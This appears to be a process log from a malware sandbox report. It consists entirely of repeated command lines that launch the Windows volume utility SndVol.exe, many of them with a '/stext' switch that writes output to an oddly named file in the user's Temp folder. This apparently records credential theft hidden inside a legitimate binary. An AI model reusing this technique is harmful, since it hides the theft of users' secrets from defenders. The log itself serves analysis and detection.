C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
